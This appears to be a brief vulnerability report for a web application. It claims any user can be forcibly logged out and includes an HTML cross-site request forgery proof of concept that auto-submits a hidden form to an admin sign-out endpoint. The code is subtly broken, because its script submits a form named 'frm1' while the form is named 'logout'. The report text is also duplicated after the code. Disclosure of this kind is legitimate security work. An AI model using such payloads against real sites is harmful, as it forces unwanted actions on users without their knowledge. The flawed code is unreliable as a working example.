Hi can force logout any user with this form <body onload="setTimeout(function() { document.frm1.submit() }, 5000)"> <form action="http://example.com/admin/sign/out" name="logout"> <input type="hidden" name="q" value="" /> </form> </body> vulnerable endpoint: http://example.com/admin/sign/out
Hi
can force logout any user with this form
vulnerable endpoint: http://example.com/admin/sign/out